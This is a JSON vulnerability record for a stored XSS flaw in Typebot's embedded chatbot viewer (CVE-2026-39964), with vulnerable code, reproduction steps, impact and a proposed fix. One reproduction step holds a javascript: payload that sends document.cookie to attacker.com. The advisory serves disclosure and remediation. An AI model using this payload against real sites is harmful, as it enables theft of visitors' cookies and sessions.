{"id":"CVE-2026-39964","aliases":["GHSA-hqmv-v56g-4m47"],"url":"https://o3.security/vulnerability/CVE-2026-39964","summary":"TypeBot: Stored XSS via javascript: URI in text bubble links — bot author executes JS on visitors' browsers","details":"### Summary\n\nThe Typebot viewer (`packages/embeds/js`) renders anchor tags from rich text bubble content without filtering the `javascript:` URI scheme. A bot author can set a link URL to `javascript:PAYLOAD`, which executes in the visitor's browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker's JavaScript runs in the host page's origin and can exfiltrate cookies and session tokens.\n\n### Details\n\nVulnerable file: `packages/embeds/js/src/features/blocks/bubbles/textBubble/components/plate/PlateBlock.tsx`\n\n```tsx\n// Line 32 — href set directly from stored bot content, no javascript: filtering\n<a href={elementDescendant.url as string} target=\"_blank\" rel=\"noopener noreferrer\">\n  {elementDescendant.children[0].text}\n</a>\n```\n\nSolidJS does not sanitize `href` attribute values — `javascript:` URIs pass through to the DOM unchanged.\n\nThe same issue exists in `ImageBubble.tsx` line 102 for image link wrapping.\n\n### Steps to Reproduce\n\n```\n1. Log in to Typebot as an authenticated user (any plan)\n2. Create a new bot\n3. Add a Text Bubble block\n4. In the rich text editor, type any link text and set the URL to:\n   javascript:fetch('https://attacker.com/?c='+document.cookie)\n5. Publish the bot and open the live/embedded viewer\n6. Click the link in the chatbot interface\n7. The JavaScript executes in the browser — cookie exfiltration request sent to attacker.com\n```\n\nSource-verified: `PlateBlock.tsx:32` renders `<a href={url}>` with no scheme filtering. Puppeteer alert confirmed `document.domain` execution when link clicked.\n\n### Impact\n\n- Any authenticated Typebot user (including free tier) can create a bot with this payload\n- When shared or embedded in a third-party site, clicking the link executes JS in the host page's origin\n- Allows stealing cookies, session tokens, or any data accessible to the embedding page\n- Shared bots are publicly accessible — no victim authentication required\n\n### Proposed Fix\n\nFilter `javascript:` URIs before rendering anchor tags:\n\n```tsx\nconst safeUrl = (url: string) =>\n  /^javascript:/i.test(url.trim()) ? '#' : url\n\n<a href={safeUrl(elementDescendant.url as string)} ...>\n```\n\nAlternatively, use a URL allowlist (only `https:`, `http:`, `mailto:`, `tel:`).","published":"2026-05-22T17:21:20.237Z","modified":"2026-08-12T03:51:29.294034159Z","cvss":{"score":5.4,"severity":"MEDIUM","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},"epss":{"score":0.00241,"percentile":0.14983,"asOf":"2026-08-24"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"@typebot.io/js","fixedVersion":"0.10.1"}],"fix":{"url":"https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b","label":"baptisteArno/typebot.io@2c3fc72"},"references":[{"type":"WEB","url":"https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/39xxx/CVE-2026-39964.json"},{"type":"ADVISORY","url":"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39964"},{"type":"FIX","url":"https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b"},{"type":"PACKAGE","url":"https://github.com/baptisteArno/typebot.io"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:29.294034159Z"}}